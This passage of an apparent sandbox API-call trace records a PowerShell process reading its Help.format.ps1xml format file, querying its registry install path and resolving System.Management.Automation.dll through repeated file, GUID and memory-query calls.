	[0093.992] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.993] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.993] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.993] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.994] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.994] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.994] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.995] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.995] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.995] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.996] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.996] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.996] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.997] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.997] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.998] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.998] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.998] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.998] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.999] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0093.999] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0xf37, lpOverlapped=0x0) returned 1
	[0093.999] ReadFile (in: hFile=0x338, lpBuffer=0x36f2097, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f2097*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.000] ReadFile (in: hFile=0x338, lpBuffer=0x36f29f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x36f29f8*, lpNumberOfBytesRead=0x16d458*=0x0, lpOverlapped=0x0) returned 1
	[0094.000] CloseHandle (hObject=0x338) returned 1
	[0094.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0094.000] SetErrorMode (uMode=0x1) returned 0x1
	[0094.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0094.000] SetErrorMode (uMode=0x1) returned 0x1
	[0094.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0094.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x338) returned 0x0
	[0094.001] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0094.001] CoTaskMemAlloc (cb=0x5a) returned 0x2ed880
	[0094.001] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ed880, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0094.002] CoTaskMemFree (pv=0x2ed880) 
	[0094.002] RegCloseKey (hKey=0x338) returned 0x0
	[0094.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0094.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0094.165] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3b25c78d, Data2=0x4249, Data3=0x4d76, Data4=([0]=0x89, [1]=0xce, [2]=0x91, [3]=0xb8, [4]=0x8d, [5]=0x86, [6]=0xdc, [7]=0x22))) returned 0x0
	[0094.165] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xc30ef811, Data2=0xb5e2, Data3=0x4a44, Data4=([0]=0xb1, [1]=0x24, [2]=0xea, [3]=0x22, [4]=0xbd, [5]=0x44, [6]=0x36, [7]=0x2e))) returned 0x0
	[0094.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.331] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xba9b0448, Data2=0x95d1, Data3=0x443d, Data4=([0]=0xad, [1]=0x87, [2]=0xd1, [3]=0x9c, [4]=0x1b, [5]=0xd3, [6]=0x49, [7]=0xe3))) returned 0x0
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.335] VirtualQuery (in: lpAddress=0x16b720, lpBuffer=0x16c5e0, dwLength=0x30 | out: lpBuffer=0x16c5e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.337] VirtualQuery (in: lpAddress=0x16b7b0, lpBuffer=0x16c670, dwLength=0x30 | out: lpBuffer=0x16c670*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.338] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.340] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.342] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.343] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.343] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
